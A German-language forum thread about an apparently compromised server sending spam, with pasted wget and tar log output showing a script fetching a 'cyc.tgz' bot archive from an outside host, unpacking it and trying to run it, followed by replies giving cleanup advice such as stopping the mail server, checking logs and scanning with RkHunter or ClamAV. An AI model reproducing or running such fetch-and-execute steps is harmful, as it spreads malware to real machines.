--2009-02-17 17:15:59--  http://moltodos.com/admin/boti/cyc.tgz
Auflösen des Hostnamen »moltodos.com«.... 174.132.116.5
Verbindungsaufbau zu moltodos.com|174.132.116.5|:80... verbunden.
HTTP Anforderung gesendet, warte auf Antwort... 200 OK
Länge: 964393 (942K) [application/x-tar]
cyc.tgz: Keine Berechtigung

Kann nicht nach »cyc.tgz« schreiben (Keine Berechtigung).
tar (Kind): cyc.tgz: Kann open nicht ausführen.: Datei oder Verzeichnis nicht gefunden
tar (Kind): Nicht behebbarer Fehler: Programmabbruch.
tar: Kindprozeß gab Status 2 zurück.
tar: Fehler beim Beenden, verursacht durch vorhergehende Fehler.
sh: line 1: cd: .,: Datei oder Verzeichnis nicht gefunden
sh: line 1: ./[B]run[/B]: Datei oder Verzeichnis nicht gefunden

Aber dann...später:

Code: 
--2009-02-17 17:17:18--  http://moltodos.com/admin/boti/cyc.tgz
Auflösen des Hostnamen »moltodos.com«.... 174.132.116.5
Verbindungsaufbau zu moltodos.com|174.132.116.5|:80... verbunden.
HTTP Anforderung gesendet, warte auf Antwort... 200 OK
Länge: 964393 (942K) [application/x-tar]
In »cyc.tgz« speichern.

     0K .......... .......... .......... .......... ..........  5% 59,4K 15s
    50K .......... .......... .......... .......... .......... 10%  213K 9s
   100K .......... .......... .......... .......... .......... 15%  219K 7s
   150K .......... .......... .......... .......... .......... 21%  230K 6s
   200K .......... .......... .......... .......... .......... 26%  237K 5s
   250K .......... .......... .......... .......... .......... 31%  286K 4s
   300K .......... .......... .......... .......... .......... 37%  261K 4s
   350K .......... .......... .......... .......... .......... 42%  335K 3s
   400K .......... .......... .......... .......... .......... 47%  213K 3s
   450K .......... .......... .......... .......... .......... 53%  231K 2s
   500K .......... .......... .......... .......... .......... 58%  220K 2s
   550K .......... .......... .......... .......... .......... 63%  231K 2s
   600K .......... .......... .......... .......... .......... 69%  529K 1s
   650K .......... .......... .......... .......... .......... 74%  249K 1s
   700K .......... .......... .......... .......... .......... 79%  229K 1s
   750K .......... .......... .......... .......... .......... 84%  231K 1s
   800K .......... .......... .......... .......... .......... 90%  255K 0s
   850K .......... .......... .......... .......... .......... 95%  250K 0s
   900K .......... .......... .......... .......... .         100%  336K=4,4s

2009-02-17 17:17:23 (214 KB/s) - »[B]cyc.tgz[/B]« gespeichert [964393/964393]

Viel Spass beim Ausmisten.
 
Last edited by a moderator:
Jetzt bleiben wir erstmal beim Thema Mail, um rauszufinden, ob die Mails direkt vom Rechner versandt werden oder der Rechner nur als Relay missbraucht wird. Du schreibst, dass alleine heute 500MB logs angefallen sind. Das ist nicht gut, denn es bedeutet, dass Du den Mailserver nicht gestoppt hast. Das solltest Du sofort tun.

Der von Dir gepostete Logfile-Auszug ist leider immer noch nicht hilfreich, da dort der Anfang fehlt. Du hast zwar alle Teile, die von einem qmgr-Prozess bearbeitet wurden aufgelistet, aber nicht die anderen Prozesse, die zu einer Mail gehören, dazu gehört u.A. auch der smtpd. Bleibe am Besten bei einer einzigen Message-ID und poste die zugehörigen Logs dafür vollständig.
 
Vlt. wäre ja mal ein Scan mit RkHunter oder ClamAV sinnvoll, um zu gucken, ob Schädlinge auf dem System sind.
 
You must log in or register to reply here.
Back
Top